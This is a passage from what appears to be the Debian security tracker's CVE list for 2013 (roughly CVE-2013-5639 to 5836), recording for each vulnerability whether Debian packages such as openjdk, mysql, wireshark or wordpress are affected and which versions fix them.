CVE-2013-5836 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5835 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-5834 (Unspecified vulnerability in Oracle Solaris 8 allows local users to af ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5833 (Unspecified vulnerability in Oracle Solaris 8 and 9 allows local users ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5832 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to Oracle's vague disclosure policy the exact nature is unknown, but since no patch landed in IcedTea we consider it not-affected
CVE-2013-5831 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5830 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5829 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5828 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-5827 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-5826 (Unspecified vulnerability in the Oracle Transportation Management comp ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-5825 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5824 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5823 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
	NOTE: http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/a7758faab30d
CVE-2013-5822 (Unspecified vulnerability in the Oracle iLearning component in Oracle ...)
	NOT-FOR-US: Oracle iLearning
CVE-2013-5821 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11.1 allows ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5820 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5819 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5818 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5817 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5816 (Unspecified vulnerability in the Oracle GlassFish Server component in ...)
	- glassfish (Full application server not packaged)
CVE-2013-5815 (Unspecified vulnerability in the Oracle Identity Analytics component i ...)
	NOT-FOR-US: Oracle Fusion Middleware Oracle Identity Analytics
CVE-2013-5814 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5813 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5812 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5811 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-5810 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaF ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5809 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5808 (Unspecified vulnerability in the Oracle iPlanet Web Proxy Server compo ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5807 (Unspecified vulnerability in Oracle MySQL Server 5.5.x through 5.5.32 ...)
	{DSA-2818-1}
	- mysql-5.5 5.5.33
	- mariadb-5.5 5.5.35-1
	- mariadb-10.0 (Fixed before initial upload)
	- mysql-5.1 (Only affects Mysql 5.5 and 5.6)
	NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
CVE-2013-5806 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...)
	- openjdk-6 (Specific to MacOS X)
	- openjdk-7 7u45-2.4.3-1
	NOTE: openjdk-7 package mentioned this CVE, specific to Mac OS X?
CVE-2013-5805 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...)
	- openjdk-6 (Specific to MacOS X)
	- openjdk-7 7u45-2.4.3-1
	NOTE: openjdk-7 package mentioned this CVE, specific to Mac OS X?
CVE-2013-5804 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1 (unimportant)
	- openjdk-7 7u45-2.4.3-1 (unimportant)
	NOTE: Javadoc comments can contain arbitrary HTML
CVE-2013-5803 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
	NOTE: http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/0b84d3b434c2
CVE-2013-5802 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5801 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to Oracle's vague disclosure policy the exact nature is unknown, but since no patch landed in IcedTea we consider it not-affected
CVE-2013-5800 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5799 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-5798 (Unspecified vulnerability in the Oracle Identity Manager component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5797 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5796 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-5795 (Unspecified vulnerability in the Oracle Demantra Demand Management com ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-5794 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5793 (Unspecified vulnerability in Oracle MySQL Server 5.6.12 and earlier al ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
	NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
CVE-2013-5792 (Unspecified vulnerability in the Techstack component in Oracle E-Busin ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-5791 (Unspecified vulnerability in the Oracle Outside In Technology componen ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5790 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5789 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5788 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5787 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5786 (Unspecified vulnerability in Oracle MySQL Server 5.6.12 and earlier al ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
	NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
CVE-2013-5785 (Unspecified vulnerability in the Oracle Reports Developer component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5784 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5783 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
	NOTE: http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/2790e9ace697
CVE-2013-5782 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5781 (Unspecified vulnerability in Oracle PARC Enterprise T4 Servers running ...)
	NOT-FOR-US: Oracle PARC Enterprise
CVE-2013-5780 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5779 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5778 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, 6u60 and ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5777 (Unspecified vulnerability in the Java SE and JavaFX components in Orac ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5776 (Unspecified vulnerability in the Java SE and Java SE Embedded componen ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5775 (Unspecified vulnerability in the Java SE and JavaFX components in Orac ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5774 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, 6u60 and ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5773 (Unspecified vulnerability in the Oracle Containers for J2EE component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5772 (Unspecified vulnerability in the Java SE component in Oracle Java SE J ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5771 (Unspecified vulnerability in the XML Parser component in Oracle Databa ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-5770 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
	NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
CVE-2013-5769 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-5768 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-5767 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
	NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
CVE-2013-5766 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-5765 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5764 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-5763 (Unspecified vulnerability in the Oracle Outside In Technology componen ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5762 (Unspecified vulnerability in the Oracle Siebel CTMS component in Oracl ...)
	NOT-FOR-US: Oracle Siebel
CVE-2013-5761 (Unspecified vulnerability in the Siebel Core - Server BizLogic Script ...)
	NOT-FOR-US: Oracle Siebel
CVE-2013-5760 (QNAP Photo Station before firmware 4.0.3 build0912 allows remote attac ...)
	NOT-FOR-US: QNAP firmware
CVE-2013-5759
	REJECTED
CVE-2013-5758 (cgi-bin/cgiServer.exx in Yealink VoIP Phone SIP-T38G allows remote aut ...)
	NOT-FOR-US: Yealink VoIP Phone
CVE-2013-5757 (Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G a ...)
	NOT-FOR-US: Yealink VoIP Phone
CVE-2013-5756 (Directory traversal vulnerability in Yealink VoIP Phone SIP-T38G allow ...)
	NOT-FOR-US: Yealink VoIP Phone
CVE-2013-5755 (config/.htpasswd in Yealink IP Phone SIP-T38G has a hardcoded password ...)
	NOT-FOR-US: Yealink IP Phone
CVE-2013-5754 (The authorization implementation on Dahua DVR appliances accepts a has ...)
	NOT-FOR-US: Dahua DVR
CVE-2013-5753
	RESERVED
CVE-2013-5752
	RESERVED
CVE-2013-5751 (Directory traversal vulnerability in SAP NetWeaver 7.x allows remote a ...)
	NOT-FOR-US: SAP NetWeaver 7.x
CVE-2013-5750 (The login form in the FriendsOfSymfony FOSUserBundle bundle before 1.3 ...)
	NOT-FOR-US: FriendsOfSymfony FOSUserBundle
CVE-2013-5749 (Cross-site scripting (XSS) vulnerability in management/prioritize_plan ...)
	NOT-FOR-US: SimpleRisk
CVE-2013-5748 (Cross-site request forgery (CSRF) vulnerability in management/prioriti ...)
	NOT-FOR-US: SimpleRisk
CVE-2013-5747
	RESERVED
CVE-2013-5746
	RESERVED
CVE-2013-5744 (Cross-site scripting (XSS) vulnerability in Feng Office 2.3.2-rc and e ...)
	NOT-FOR-US: Feng Office
CVE-2013-5743 (Multiple SQL injection vulnerabilities in Zabbix 1.8.x before 1.8.18rc ...)
	- zabbix 1:2.0.8+dfsg-2
	[squeeze] - zabbix (Not supported in Squeeze LTS)
CVE-2013-5742
	RESERVED
CVE-2013-5741 (Triangle Research International (aka Tri) Nano-10 PLC devices with fir ...)
	NOT-FOR-US: Triangle Research International Nano-10 PLC
CVE-2013-5745 (The vino_server_client_data_pending function in vino-server.c in GNOME ...)
	- vino 3.10.1-1 (low; bug #724545)
	[wheezy] - vino (Minor issue)
	[squeeze] - vino (Minor issue)
	NOTE: http://seclists.org/fulldisclosure/2013/Sep/105
CVE-2013-5740 (Unspecified vulnerability in the Intel Trusted Execution Technology (T ...)
	NOT-FOR-US: Intel Trusted Execution Technology
CVE-2013-5739 (The default configuration of WordPress before 3.6.1 does not prevent u ...)
	{DSA-2757-1}
	- wordpress 3.6.1+dfsg-1
CVE-2013-5738 (The get_allowed_mime_types function in wp-includes/functions.php in Wo ...)
	{DSA-2757-1}
	- wordpress 3.6.1+dfsg-1
CVE-2013-5737
	RESERVED
CVE-2013-5736
	RESERVED
CVE-2013-5735
	RESERVED
CVE-2013-5734
	RESERVED
CVE-2013-5733
	RESERVED
CVE-2013-5732
	RESERVED
CVE-2013-5731
	RESERVED
CVE-2013-5730 (Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link D ...)
	NOT-FOR-US: D-Link
CVE-2013-5729
	RESERVED
CVE-2013-5728
	RESERVED
CVE-2013-5727
	RESERVED
CVE-2013-5726 (Tweetbot 1.3.3 for Mac, and 2.8.5 for iPad and iPhone, does not requir ...)
	NOT-FOR-US: Tweetbot for iOS and Mac
CVE-2013-5725 (The Metaclassy Byword app 2.x before 2.1 for iOS does not require conf ...)
	NOT-FOR-US: Byword for iOS
CVE-2013-5724 (Phpbb3 before 3.0.11-4 for Debian GNU/Linux uses world-writable permis ...)
	{DSA-2752-1}
	- phpbb3 3.0.11-4 (bug #711172)
CVE-2013-5723 (SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attack ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2013-5716 (Gretech GOM Media Player 2.2.53.5169 and possibly earlier allows remot ...)
	NOT-FOR-US: Gretech GOM Media Player
CVE-2013-5715 (Buffer overflow in Gretech GOM Media Player before 2.2.53.5169 has uns ...)
	NOT-FOR-US: Gretech GOM Media Player
CVE-2013-5714 (Multiple cross-site scripting (XSS) vulnerabilities in ls/htmlchat.php ...)
	NOT-FOR-US: WordPress plugin videowhisper-live-streaming-integration
CVE-2013-5713
	RESERVED
CVE-2013-5712
	RESERVED
CVE-2013-5711 (Cross-site scripting (XSS) vulnerability in admin/walkthrough/walkthro ...)
	NOT-FOR-US: Design-approval-system Plugin for WordPress
CVE-2013-5722 (Unspecified vulnerability in the LDAP dissector in Wireshark 1.8.x bef ...)
	{DSA-2756-1}
	- wireshark 1.10.2-1
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-59.html
CVE-2013-5721 (The dissect_mq_rr function in epan/dissectors/packet-mq.c in the MQ di ...)
	{DLA-497-1}
	- wireshark 1.10.2-1 (unimportant)
	NOTE: Not suitable for code injection
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-58.html
CVE-2013-5720 (Buffer overflow in the RTPS dissector in Wireshark 1.8.x before 1.8.10 ...)
	{DSA-2756-1}
	- wireshark 1.10.2-1
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-57.html
CVE-2013-5719 (epan/dissectors/packet-assa_r3.c in the ASSA R3 dissector in Wireshark ...)
	{DLA-497-1}
	- wireshark 1.10.2-1 (unimportant)
	NOTE: Not suitable for code injection
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-56.html
CVE-2013-5718 (The dissect_nbap_T_dCH_ID function in epan/dissectors/packet-nbap.c in ...)
	{DSA-2756-1}
	- wireshark 1.10.2-1
	[squeeze] - wireshark (Vulnerable code not present)
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-55.html
CVE-2013-5717 (The Bluetooth HCI ACL dissector in Wireshark 1.10.x before 1.10.2 does ...)
	- wireshark 1.10.2-1
	[wheezy] - wireshark (Only affects 1.10.x)
	[squeeze] - wireshark (Only affects 1.10.x)
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-54.html
CVE-2013-5710 (The nullfs implementation in sys/fs/nullfs/null_vnops.c in the kernel ...)
	{DSA-2769-1}
	- kfreebsd-9 9.2~svn255465-1 (bug #722337)
	- kfreebsd-8
	[squeeze] - kfreebsd-8 (Unsupported in squeeze-lts)
	[wheezy] - kfreebsd-8 8.3-6+deb7u1
CVE-2013-5709 (The authentication implementation in the web server on Siemens SCALANC ...)
	NOT-FOR-US: Siemens SCALANCE X-200
CVE-2013-5708 (Coursemill Learning Management System (LMS) 6.8 constructs secret toke ...)
	NOT-FOR-US: Coursemill Learning Management System
CVE-2013-5707 (Multiple cross-site scripting (XSS) vulnerabilities in Coursemill Lear ...)
	NOT-FOR-US: Coursemill Learning Management System
CVE-2013-5706 (Multiple cross-site scripting (XSS) vulnerabilities in Coursemill Lear ...)
	NOT-FOR-US: Coursemill Learning Management System
CVE-2013-5705 (apache2/modsecurity.c in ModSecurity before 2.7.6 allows remote attack ...)
	{DSA-2991-1 DLA-34-1}
	- modsecurity-apache 2.7.7-1
	- libapache-mod-security
	[squeeze] - libapache-mod-security 2.5.12-1+squeeze4
	NOTE: Upstream commit: https://github.com/SpiderLabs/ModSecurity/commit/f8d441cd25172fdfe5b613442fedfc0da3cc333d
	NOTE: http://martin.swende.se/blog/HTTPChunked.html
CVE-2013-5704 (The mod_headers module in the Apache HTTP Server 2.2.22 allows remote ...)
	{DLA-71-1}
	- apache2 2.4.10-2 (medium)
	[wheezy] - apache2 2.2.22-13+deb7u4
	NOTE: http://marc.info/?l=apache-httpd-dev&m=139636309822854&w=2
CVE-2013-5703 (The DrayTek Vigor 2700 router 2.8.3 allows remote attackers to execute ...)
	NOT-FOR-US: DrayTek Vigor 2700 router
CVE-2013-5702 (Multiple cross-site scripting (XSS) vulnerabilities in WebCenter in Wa ...)
	NOT-FOR-US: Watchguard Server Center
CVE-2013-5701 (Multiple untrusted search path vulnerabilities in (1) Watchguard Log C ...)
	NOT-FOR-US: Watchguard Server Center
CVE-2013-5700 (The Bloom Filter implementation in bitcoind and Bitcoin-Qt 0.8.x befor ...)
	- bitcoin 0.8.4-1
	NOTE: https://bitcointalk.org/index.php?topic=287351.0
CVE-2013-5699
	RESERVED
CVE-2013-5698 (Cross-site scripting (XSS) vulnerability in Open-Xchange AppSuite and ...)
NOT-FOR-US: Open-Xchange CVE-2013-5697 (SQL injection vulnerability in mod_accounting.c in the mod_accounting ...) - libapache-mod-acct CVE-2013-5696 (inc/central.class.php in GLPI before 0.84.2 does not attempt to make i ...) - glpi 0.84.2-1 (unimportant; bug #723837) NOTE: Only supported behind an authenticated HTTP zone CVE-2013-5695 (Multiple cross-site scripting (XSS) vulnerabilities in Opsview before ...) NOT-FOR-US: Ops View CVE-2013-5694 (SQL injection vulnerability in status/service/acknowledge in Opsview b ...) NOT-FOR-US: Ops View CVE-2013-5693 (Cross-site scripting (XSS) vulnerability in X2Engine X2CRM before 3.5 ...) NOT-FOR-US: X2CRM CVE-2013-5692 (Directory traversal vulnerability in X2Engine X2CRM before 3.5 allows ...) NOT-FOR-US: X2CRM CVE-2013-5691 (The (1) IPv6 and (2) ATM ioctl request handlers in the kernel in FreeB ...) {DSA-2769-1} - kfreebsd-9 9.2~svn255465-1 (bug #722338) - kfreebsd-8 [squeeze] - kfreebsd-8 (Unsupported in squeeze-lts) [wheezy] - kfreebsd-8 8.3-6+deb7u1 CVE-2013-5690 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Ap ...) NOT-FOR-US: Open-Xchange CVE-2013-5687 (RiskNet Acquirer before hotfix 6.0 b7+ADHOC-443 ApplicationServiceBean ...) NOT-FOR-US: RiskNet Acquirer CVE-2013-5686 RESERVED CVE-2013-5685 RESERVED CVE-2013-5684 RESERVED CVE-2013-5683 RESERVED CVE-2013-5682 RESERVED CVE-2013-5681 RESERVED CVE-2013-5680 (Heap-based buffer overflow in hfaxd in HylaFAX+ 5.2.4 through 5.5.3, w ...) - hylafax (Not built with LDAP support) NOTE: http://www.securityfocus.com/archive/1/528943/30/0/threaded CVE-2013-5679 (The authenticated-encryption feature in the symmetric-encryption imple ...) NOT-FOR-US: OWASP Enterprise Security API for Java CVE-2013-5678 RESERVED CVE-2013-5677 RESERVED CVE-2013-5676 (The Jenkins Plugin for SonarQube 3.7 and earlier allows remote authent ...) NOT-FOR-US: SonarQube Jenkins plugin CVE-2013-5674 (badges/external.php in Moodle 2.5.x before 2.5.2 does not properly han ...) 
- moodle 2.5.2-1 [squeeze] - moodle (Only affects 2.5.x) CVE-2013-5669 (The Thecus NAS server N8800 with firmware 5.03.01 uses cleartext crede ...) NOT-FOR-US: Thecus NAS server N8800 CVE-2013-5668 (The ADS/NT Support page on the Thecus NAS server N8800 with firmware 5 ...) NOT-FOR-US: Thecus NAS server N8800 CVE-2013-5667 (The Thecus NAS server N8800 with firmware 5.03.01 allows remote attack ...) NOT-FOR-US: Thecus NAS server N8800 CVE-2013-5666 (The sendfile system-call implementation in sys/kern/uipc_syscalls.c in ...) - kfreebsd-9 9.2~svn255465-1 (bug #722336) [wheezy] - kfreebsd-9 (Only affects 9.2.x) CVE-2013-5665 RESERVED CVE-2013-5664 (Cross-site scripting (XSS) vulnerability in the web-based device-manag ...) NOT-FOR-US: Palo Alto Networks PAN-OS CVE-2013-5663 (The App-ID cache feature in Palo Alto Networks PAN-OS before 4.0.14, 4 ...) NOT-FOR-US: Palo Alto Networks PAN-OS CVE-2013-5662 RESERVED CVE-2013-5661 (Cache Poisoning issue exists in DNS Response Rate Limiting. ...) NOTE: DNS protocol flaw NOTE: http://www.certa.ssi.gouv.fr/site/CERTA-2013-AVI-506/index.html NOTE: https://www.isc.org/blogs/cache-poisoning-gets-a-second-wind-from-rrl-probably-not/ CVE-2013-5660 (Buffer overflow in Power Software WinArchiver 3.2 allows remote attack ...) NOT-FOR-US: Power Software WinArchiver CVE-2013-5659 (Wiz 5.0.3 has a user mode write access violation ...) NOT-FOR-US: Wiz CVE-2013-5658 (AultWare pwStore 2010.8.30.0 has XSS ...) NOT-FOR-US: AultWare pwStore CVE-2013-5657 (AultWare pwStore 2010.8.30.0 has DoS via an empty HTTP request ...) NOT-FOR-US: AultWare pwStore CVE-2013-5656 (FuzeZip 1.0.0.131625 has a Local Buffer Overflow vulnerability ...) NOT-FOR-US: FuzeZip CVE-2013-5689 [Arbitrary File Upload] REJECTED CVE-2013-5688 (Multiple directory traversal vulnerabilities in index.php in AjaXplore ...) 
- ajaxplorer (bug #668381) CVE-2013-5675 RESERVED NOT-FOR-US: Symantec Endpoint Protection CVE-2013-4298 (The ReadGIFImage function in coders/gif.c in ImageMagick before 6.7.8- ...) {DSA-2750-1} - imagemagick 8:6.7.7.10-6 (bug #721273) [squeeze] - imagemagick (Code not vulnerable) CVE-2013-5673 (SQL injection vulnerability in testimonial.php in the IndiaNIC Testimo ...) NOT-FOR-US: IndiaNIC Testimonial plugin 2.2 for WordPress CVE-2013-5672 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Indi ...) NOT-FOR-US: IndiaNIC Testimonial plugin 2.2 for WordPress CVE-2013-5671 (lib/dragonfly/imagemagickutils.rb in the fog-dragonfly gem 0.8.2 for R ...) NOT-FOR-US: fog-dragonfly Ruby Gem CVE-2013-5670 (Cross-site scripting (XSS) vulnerability in spell-check-savedicts.php ...) - serendipity (Spellcheck plugin not included in 1.5.x) CVE-2013-5653 (The getenv and filenameforall functions in Ghostscript 9.10 ignore the ...) {DSA-3691-1 DLA-674-1} - ghostscript 9.19~dfsg-3.1 (low; bug #839118) NOTE: http://bugs.ghostscript.com/show_bug.cgi?id=694724 NOTE: https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8 CVE-2013-5652 RESERVED CVE-2013-5650 (Junos Pulse Secure Access Service (IVE) 7.1 before 7.1r5, 7.2 before 7 ...) NOT-FOR-US: Junos Pulse Secure Access Service CVE-2013-5649 (Multiple cross-site scripting (XSS) vulnerabilities in Juniper Junos P ...) NOT-FOR-US: Juniper CVE-2013-5655 (Directory traversal vulnerability in the FTP server in YingZhi Python ...) NOT-FOR-US: YingZhi Python for iOS CVE-2013-5654 (Vulnerability in YingZhi Python Programming Language v1.9 allows arbit ...) NOT-FOR-US: YingZhi Python for iOS CVE-2013-5651 (The virBitmapParse function in util/virbitmap.c in libvirt before 1.1. ...) 
- libvirt 1.1.2~rc1-1 [jessie] - libvirt (vulnerable code not introduced, introduced in v0.10.2-rc1) [wheezy] - libvirt (vulnerable code not introduced, introduced in v0.10.2-rc1) [squeeze] - libvirt (vulnerable code not introduced, introduced in v0.10.2-rc1) NOTE: introduced by: http://libvirt.org/git/?p=libvirt.git;a=commit;h=0fc89098a68f0f6962de8be4fc03ddd960ffbf08 NOTE: Upstream fix: http://libvirt.org/git/?p=libvirt.git;a=commit;h=47b9127e883677a0d60d767030a147450e919a25 CVE-2013-5646 (Cross-site scripting (XSS) vulnerability in Roundcube webmail 1.0-git ...) - roundcube (Unclear, 0.9.2 reported not affected, all other issues covered by CVE-2013-5645) CVE-2013-5645 (Multiple cross-site scripting (XSS) vulnerabilities in Roundcube webma ...) - roundcube 0.9.4-1 (bug #721592) [wheezy] - roundcube (Minor issue) [squeeze] - roundcube (Minor issue) NOTE: http://web.archive.org/web/20160311164159/http://trac.roundcube.net/changeset/93b0a30c1c8aa29d862b587b31e52bcc344b8d16/github NOTE: http://web.archive.org/web/20160311132902/http://trac.roundcube.net/changeset/ce5a6496fd6039962ba7424d153278e41ae8761b/github NOTE: http://trac.roundcube.net/ticket/1489251 CVE-2013-5644 RESERVED CVE-2013-5643 REJECTED CVE-2013-5640 (Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote att ...) NOT-FOR-US: Gnew CVE-2013-5639 (Directory traversal vulnerability in users/login.php in Gnew 2013.1 an ...) NOT-FOR-US: Gnew CVE-2013-5648 (Absolute path traversal vulnerability in the 